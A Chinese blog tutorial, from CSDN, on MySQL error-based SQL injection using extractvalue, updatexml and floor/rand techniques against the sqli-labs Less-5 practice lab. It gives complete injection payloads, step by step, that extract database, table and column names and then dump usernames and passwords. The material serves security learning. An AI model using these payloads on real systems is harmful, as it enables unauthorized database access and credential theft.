几种常见的报错注入类型详解

最新推荐文章于 2024-07-26 12:52:45 发布
最新推荐文章于 2024-07-26 12:52:45 发布
阅读量576 收藏 27
点赞数 19
分类专栏: sql 文章标签: 数据库 sql web php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74312676/article/details/140594411
版权

目录

一、extractvalue报错注入

(1)查询库名

(2)拿到表名

 (3)拿到要查询表中的列名

 (4)拿到列中的具体信息

二、updatexml报错注入

(1)注入原理

(2)查询库名

 (3)查询表名

 (4)查询列名

 (5)拿到列中的具体信息

三、floor报错

(1)涉及到的函数

rand()函数:生成随机数0~1

 floor函数:向下取整

 concat_ws()函数:将括号内数据用第一个字段连接起来

as别名、group by分组

(2)floor注入原理

(3)查询库名

 (4)查询表名

 (5)查询列名

 (6)拿到列中的具体信息

报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。

可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。

建议看不懂的同学可以看看我的上一篇文章:Union注入-CSDN博客

一、extractvalue报错注入

extractvalue 函数在 SQL 注入攻击中经常被用于报错注入,特别是在 MySQL 数据库中。它的作用是从 XML 文档中提取值。然而,当提供无效的 XML 路径时,它会生成一个错误,攻击者可以利用这个错误来获取数据库信息。

常见的攻击方式:在路径前面加'~',使得路径无效,从而返回我们想要的信息

在 MySQL 中,extractvalue 函数的基本语法如下:

 extractvalue(xml_fragment, xpath_expression)

 xml_fragment:这是一个XML字符

xpath_expression:xpath表达式,指定提取路径

以less-5为例:

(1)查询库名

当我们输入id=1查询时,发现并没有回显详细信息,这表示可能是报错注入

 于是采用以下查询(闭合方式和列数的查询已省去):

 id=1' union select 1,2,extractvalue(1,concat('~',(select database()))) --+

 1传递给 extractvalue 函数的第一个参数。这里使用了一个与 XML 文档无关的无意义的值。这个值实际上在这里并不重要,因为 extractvalue 的主要目的是引发一个错误或返回其第二个参数的内容。

concat函数:用于将两部分连接起来,即将~和select database()返回的库名连接起来,这里由于在路径前面加了’~‘,于是会报错,并在报错信息中暴露库名(这里的~也可以变为0x7e,即~的ascii码值)

 

 得到库名:security

(2)拿到表名

跟上面一样,就在extractvalue函数内去进行查询,查询表名,

 ?id=1' union select 1,2,extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema=database()))) --+

 但是看到返回,说明返回行太多,于是我们加入group_concat函数,将所有行的值转化为一行来输出。

 于是拿到了security库中所有的表名:

 (3)拿到要查询表中的列名

可以看到三列的内容:

?id=1' union select 1,2,extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) --+

 

 (4)拿到列中的具体信息

查询id,username,password的具体信息

?id=1' union select 1,2,extractvalue(1,concat('~',(select group_concat(id,username,password) from users))) --+

 但是返回值只有一小部分,这是因为extractvalue的回显只有32个字符,要想显示全部的字符,需要用到substring函数

substring函数格式:

substring(要显示的内容,显示开始的位置,要显示的字符数)

 如substring(123456,4,3),回显的信息为456

于是,将substring函数加入得:

?id=1' union select 1,2,extractvalue(1,concat('~',(select substring(group_concat(id,username,password),1,30) from users))) --+

 

 可以查看到前30个字符,要看后面的只需将查看的字符位变化即可

 于是就拿到了我们想要的信息了!!!

二、updatexml报错注入

(1)注入原理

updatexml函数格式

updatexml(XML_document,XPath_string,new_value)

 XML_document:是string类型格式,为XML文档对象名称

XPath_string:路径,XPath格式的字符串

new_value:string格式,替换查找到的符合条件的数据

updatexml报错原理

跟extractvalue一样,输入错误的第二个参数,即更改路径符号,就会报错

正常句式:

select updatexml(doc,'book/auther/surname','1')from xml

错误句式:

select updatexml(doc,'~book/auther/surname','1')from xml

(2)查询库名

?id=1" and 1=updatexml(1,concat('~',(select database())),3) --+

 

 (3)查询表名

(这里建议看不懂的同学,可以去看看专栏里面的文章,Union注入-CSDN博客,这里就不再赘述)

?id=1" and 1=updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) --+

 

 (4)查询列名

?id=1" and 1=updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),3) --+

 

 (5)拿到列中的具体信息

updatexml函数跟extractvalue函数一样,一次的回显位只有,三十二个字符,这里同样也要用到substring函数,substr函数跟substring函数的用法几乎一致,这里我们用substr

?id=1" and 1=updatexml(1,concat('~',(select substr(group_concat(id,username,password),1,30) from users)),3) --+

 

 成功拿到信息!!!

三、floor报错

(1)涉及到的函数

rand():随机返回0~1间的小数

floor():小数向下取整

ceiling():小数向上取整

concat_ws():将括号内数据用第一个字段连接起来

as:别名

count():汇总统计数量

limit():显示指定行数

rand()函数:生成随机数0~1

为了更好地理解这个函数,我们在phpMyAdmin里面敲命令来查看其执行结果

select rand();

 会生成一个0~1的随机数

  生成0~2之间的随机数

 select rand()*2;

 select rand()*2 from users;

 根据users表的行数,随机生成0~2之间的随机数

 floor函数:向下取整

select floor(rand()*2) from users;

 rand()*2的结果是0~2之间的随机数,所以floor向下取整之后的结果为0或者1,根据表users的行数生成对应行的随机数

 concat_ws()函数:将括号内数据用第一个字段连接起来

CONCAT_WS(separator, string1, string2, ..., stringN)

separator:分隔符,必须的。您可以使用单个字符,也可以使用字符串。

string1, string2, ..., stringN:必需的,至少应指定一个字符串;如果拼接的参数为 NULL, 则会被忽略;当不指定字符串时,MySQL 将会报错: ERROR 1582 (42000): Incorrect parameter count in the call to native function 'CONCAT_WS'

返回值

  • CONCAT_WS() 函数返回使用分隔符连接后的多个字符串。
  • 如果 separator 为 NULLCONCAT_WS() 函数将返回 NULL
  • 如果 string1, string2, ..., stringN 中有 NULL,则会被 CONCAT_WS() 函数忽略。

示例:

select concat_ws('~',(select database()),floor(rand()*2)) from users;

 将两部分(select database())和floor(rand()*2)的结果用’~‘连接起来

as别名、group by分组

select concat_ws('~',(select database()),floor(rand()*2)) as ben from users group by ben;

 将concat_ws('~',(select database()),floor(rand()*2))表名改为ben,并按照ben分组

(2)floor注入原理

在对数据库执行如下命令的时候,会发现有报错:

select count(*),concat('~',(select(database()),floor(rand(0)*2) as benben from users group by benben);

 这是因为rand函数进行分组group by和统计count时可能会多次执行,导致key键值重复,于是我们可以利用这种特点来实现注入

 floor注入构造payload可以用下面的公式:

union select 1,count(*),concat_ws("连接字符”,string1,string2,.......,stringN) as x from information_schema.tables group by x --+

 注意:这里的information_schema.tables作用是让rand()产生足够多的的计算次数,一般使用行数比较多的默认数据表information_schema.tables,这个与我们查表用到的information_schema.tables意义不同

 (3)查询库名

?id=1' union select 1,count(*),concat_ws('~',(select database()) ,floor(rand(0)*2)) as x from information_schema.tables group by x --+

 

 (4)查询表名

?id=1' union select 1,count(*),concat_ws('~',(select table_name from information_schema.tables where table_schema=database()) ,floor(rand(0)*2)) as x from information_schema.tables group by x --+

 

 只需改动红色字部分,查询表即可,但是会发现报错提示输出从超过一行,也就是每次只能输出一行,于是我们加一个limit函数来进行输出限制,limit 3,1 表示输出第三行,每次输出一行,于是可以得到表名

?id=1' union select 1,count(*),concat_ws('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1) ,floor(rand(0)*2)) as x from information_schema.tables group by x --+

 

 (5)查询列名

?id=1' union select 1,count(*),concat_ws('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users'  limit 1,1) ,floor(rand(0)*2)) as x from information_schema.tables group by x --+

 

 (6)拿到列中的具体信息

 ?id=1' union select 1,count(*),concat_ws('~',(select concat(username,password) from users limit 1,1), floor(rand(0)*2)) as x from information_schema.tables group by x--+

 

 成功啦!!!!

最常用到的几种报错注入都在这里了,喜欢的话给我点个赞吧。

我们一起成长!!!

声明:参考自橙子科技课程

一路向北_.
关注
  • 19
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
报错注入详解
weixin_45253622的博客
03-19 1万+
报错注入 报错注入SQL注入的一种。 利用前提:页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点:不需要显示位 缺点:需要输出mysql_error()的报错信息 报错函数 1、floor报错注入 floor()报错注入是利用count()、rand()、floor()、group by 这几个特定的函数结合在一起产生的注入漏洞,准确的说是floor,count,group by冲突报错。 报错原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主
access注入详解
聚鼎安全
12-23 1253
目录Access数据库手工注入判断注入点判断数据库类型判断可以进行什么类型的注入联合注入1. 判断存在的字段数2. 作用:可以用来判断查询语句所在的表到底有多少个字段3. 猜解表名4. 猜解列名5. 猜解表名列名布尔盲注判断有无admin 这个表判断有无password这个列判断有数据长度偏移注入注入原理判断多少个列查询表的列数偏移注入移位溢注正文1. 判断字段长度2.判断表名3. 判断表长4. 开始偏移 Access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
Spring属性注入的几种方式详解
小鲁班-JAVA开发
09-15 483
给各种类型的对象赋值 Student类和MathTeacher类 package com.xqc; import java.util.Arrays; import java.util.List; import java.util.Map; import java.util.Set; public class Student { //学号 private Integer stuNo; //姓名 private String stuName; //爱好 p
三种数据库SQL 注入详解
YT的博客
02-25 11万+
SQL 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL 注入分类 1. 数字型注入 当输入的参数为整型时,则有可能存在数字型注入漏洞。 假设存在一条 URL 为:HTTP://www.aaa.com/test...
sql注入手法详解
m0_71299382的博客
11-26 1万+
sql注入总结
Java注入bean的方式_详解Spring中bean的几种注入方式
weixin_34287049的博客
03-02 2241
首先,要学习Spring中的Bean的注入方式,就要先了解什么是依赖注入。依赖注入是指:让调用类对某一接口的实现类的实现类的依赖关系由第三方注入,以此来消除调用类对某一接口实现类的依赖。Spring容器中支持的依赖注入方式主要有属性注入、构造函数注入、工厂方法注入。接下来将为大家详细介绍这三种依赖注入的方式以及它们的具体配置方法。1.属性注入属性注入即通过setXXX( )方法注入bean的属性值...
SQL注入基础入门篇 注入思路及常见SQL注入类型总结
好好睡觉
03-04 6853
SQL注入基础部分、注入脚本、常见注入类型分类、报错注入、联合查询思路
sql注入详解 一文了解sql注入所有常见方法
闵行小鱼塘
09-22 3349
刷完了sqli-labs,对sql注入有了些许认识,在此做个小结与记录
Mysql报错注入详解.docx
11-20
MySQL 报错注入是一种安全漏洞利用技术,当应用程序在处理用户输入时未能充分过滤或转义SQL语句,导致数据库因错误语法而返回错误信息,攻击者可以通过分析这些错误信息来获取敏感信息或执行恶意操作。以下是对MySQL...
详解几种常用电阻参数的表示方法
01-20
电阻是非常常见的电子元器件,前面我们介绍过常见的电阻分类,几种常见特殊电阻及电阻的检测方法,今天让我们一起来学一学电阻参数的几种常用的表示方法。  电阻的参数主要有直标法、文字符号法、色标法和数码表示...
pytorch常见的Tensor类型详解
09-18
今天小编就为大家分享一篇pytorch常见的Tensor类型详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Spring Bean三种注入方式详解
08-28
Spring Bean三种注入方式详解 在 Spring 框架中,Bean 的依赖注入是通过容器来管理和提供的。依赖注入有三种方式:使用属性的 setter 方法注入、使用构造器注入和使用 Filed 注入。 使用属性的 setter 方法注入 ...
SQL Server比较常见数据类型详解
01-19
系统提供的数据类型分为几大类,如表4-2 所示。  其中,BIGINT、 SQL_VARIANT 和TABLE 是SQL Server 2000 中新增加的3 种数据类型。下面分类讲述各种数据类型。 一、 整数数据类型  整数数据类型是最常用的数据...
基于JSP的高校信息资源共享平台
heye0910032的博客
07-22 698
高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。通过使用JSP技术和MySQL数据库,本系统实现了一个稳定、安全、易用的高校信息资源管理平台。虽然在开发过程中遇到了一些技术挑战,但通过不断学习和实践,最终完成了一个能够满足用户需求的系统。未来,我们将继续优化系统功能,提升用户体验,以期达到更高的应用价值和社会效益。高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。
秒杀业务: 简单梳理
m0_59925573的博客
07-23 1603
(1)在一人一单优惠券秒杀中,先是解决了因线程安全导致的超卖问题,为了满足一人一单的业务需求需要给查询订单表查询库存表上锁,但是synchronized只能满足单机环境下线程安全,在分布式环境对多个JVM需要使用分布式锁,于是手写分布式锁,但是在极端情况下,例如业务超时,会出现“误删”问题,手写锁无法解决,于是引入redisson,借助看门狗机制可以有效解决这个问题。
家政项目小程序的设计
最新发布
2401_85476437的博客
07-26 335
管理员账户功能包括:系统首页,个人中心,用户管理,家政人员管理,家政服务管理,咨询信息管理,咨询服务管理,家政预约管理,留言板管理,系统管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,家政服务,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 245
数据库查询与操作指南-以Nebula图数据库为例
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值